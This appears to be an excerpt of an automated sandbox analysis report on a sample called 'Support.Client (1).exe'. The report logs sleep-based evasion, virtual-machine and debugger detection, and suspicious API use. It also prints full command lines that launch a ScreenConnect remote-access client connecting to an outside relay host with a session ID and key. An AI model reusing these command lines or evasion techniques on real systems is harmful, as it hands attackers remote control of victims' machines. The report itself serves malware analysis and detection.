Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -594375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -594266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -594156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -594047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -593938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -593807s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -593703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -593594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -593469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -593360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -593235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -593110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -592985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -592838s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -592610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -592379s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -592250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -592141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -592031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -591922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -591813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -591688s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1620	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe TID: 7500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe TID: 7536	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe TID: 7760	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\Support.Client (1).exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Support.Client (1).exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599668	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599444	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599195	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597260	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597112	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595055	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593807	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592838	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592379	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 591922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 591813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 591688	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\	Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: dfsvc.exe, 00000001.00000002.2548739269.000002CAF4DF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2933814122.00000289A7858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2931862362.00000289A222B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2A59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWte
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2943100144.0000000004750000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: dfsvc.exe, 00000001.00000002.2548739269.000002CAF4E06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`n
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Support.Client (1).exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00614573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00614573

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Support.Client (1).exe

0_2_00611000

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00613677 mov eax, dword ptr fs:[00000030h]

0_2_00613677

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00616893 GetProcessHeap,

0_2_00616893

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process token adjusted: Debug

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\Support.Client (1).exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_00611493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00611493
Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_00614573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00614573
Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_0061191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0061191F
Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_00611AAC SetUnhandledExceptionFilter,	0_2_00611AAC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\22k7ydel.ejg\caepj7q4.xnd\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\screenconnect.clientservice.exe" "?e=support&y=guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=bgiaaackaabsu0exaagaaaeaaqdtq8jitjvfazpjsqj2xeoaqakfozz605yz6hyiv8m7oonlwfdwfe3v2tudeo1xgqjdiuzvf4job0h77n%2f3xydpec8%2bixvzfdeeqv6zmkted4w4v7cairb78fnannqhdatnnocwxvax3zjxyij2eh8ckvfr9wwips1vkpom9jtq4tpgxx%2fag0amdztc1v7ah7ztajobrnevdo1msjod7ol713mysjac5clryhpejuocgahv9uunovpvt51njb5fuzvgwp32mcuwprjpolaxfruswom879couphd68bexmxshqan9sldljj53kqwsixmtr1whx2%2b2ghrj3qgw9exo8o8&r=&i=untitled%20session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\22k7ydel.ejg\caepj7q4.xnd\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\screenconnect.clientservice.exe" "?e=support&y=guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=bgiaaackaabsu0exaagaaaeaaqdtq8jitjvfazpjsqj2xeoaqakfozz605yz6hyiv8m7oonlwfdwfe3v2tudeo1xgqjdiuzvf4job0h77n%2f3xydpec8%2bixvzfdeeqv6zmkted4w4v7cairb78fnannqhdatnnocwxvax3zjxyij2eh8ckvfr9wwips1vkpom9jtq4tpgxx%2fag0amdztc1v7ah7ztajobrnevdo1msjod7ol713mysjac5clryhpejuocgahv9uunovpvt51njb5fuzvgwp32mcuwprjpolaxfruswom879couphd68bexmxshqan9sldljj53kqwsixmtr1whx2%2b2ghrj3qgw9exo8o8&r=&i=untitled%20session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\22k7ydel.ejg\caepj7q4.xnd\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\screenconnect.clientservice.exe" "?e=support&y=guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=bgiaaackaabsu0exaagaaaeaaqdtq8jitjvfazpjsqj2xeoaqakfozz605yz6hyiv8m7oonlwfdwfe3v2tudeo1xgqjdiuzvf4job0h77n%2f3xydpec8%2bixvzfdeeqv6zmkted4w4v7cairb78fnannqhdatnnocwxvax3zjxyij2eh8ckvfr9wwips1vkpom9jtq4tpgxx%2fag0amdztc1v7ah7ztajobrnevdo1msjod7ol713mysjac5clryhpejuocgahv9uunovpvt51njb5fuzvgwp32mcuwprjpolaxfruswom879couphd68bexmxshqan9sldljj53kqwsixmtr1whx2%2b2ghrj3qgw9exo8o8&r=&i=untitled%20session" "1"	Jump to behavior

Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Progman
